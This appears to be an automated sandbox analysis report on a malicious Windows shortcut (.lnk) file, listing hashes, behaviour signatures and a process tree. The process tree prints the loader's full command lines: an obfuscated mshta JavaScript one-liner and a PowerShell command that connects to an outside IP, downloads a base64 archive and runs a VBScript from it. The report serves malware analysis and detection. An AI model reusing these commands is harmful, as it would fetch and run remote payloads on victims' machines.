Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    17/09/2024, 01:10

General

  • Target

    41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229.lnk

  • Size

    2KB

  • MD5

    37fb639a295daa760c739bc21c553406

  • SHA1

    50e4d8a112e4aad2c984d22f83c80c8723f232da

  • SHA256

    41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229

  • SHA512

    28d67d4d788f301590164f28d38dd2aa73e4669eb6886e7536bec47aea08f2c27c3a507ac1636d907735f644d5e67184f420fd1e556629e10b83c8d338ef159a

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:588
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" javascript:p="se64String($z);$";s="Stream";w="a=new Act"+"iveXObject('WScr"+"ipt.Shell');a.Run(c,0,0);close();";a="System.IO."+s;t=" -Path $t -";n="New-Object System.";d="c:\\programdata";c="power"+"shell -ep bypass -c $r='64.49.14.181';$p='8014';$r="+n+"IO."+s+"Reader(("+n+"Net.Sockets.TcpClient($r, $p)).Get"+s+"());$z=$r.ReadLine();$b=[Con"+"vert]::FromBa"+p+"t='"+d+"\\t.zip';Set-Content"+t+"V $b -Encoding Byte;Expand-Archive"+t+"D "+d+";del $t;$v='"+d+"\\s.vbs';&$v;sc "+d+"\\nt91610 81";eval(w);
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $r='64.49.14.181';$p='8014';$r=New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TcpClient($r, $p)).GetStream());$z=$r.ReadLine();$b=[Convert]::FromBase64String($z);$t='c:\programdata\t.zip';Set-Content -Path $t -V $b -Encoding Byte;Expand-Archive -Path $t -D c:\programdata;del $t;$v='c:\programdata\s.vbs';&$v;sc c:\programdata\nt91610 81
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2764

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2764-41-0x0000000002480000-0x0000000002488000-memory.dmp

    Filesize

    32KB

  • memory/2764-40-0x000000001B320000-0x000000001B602000-memory.dmp

    Filesize

    2.9MB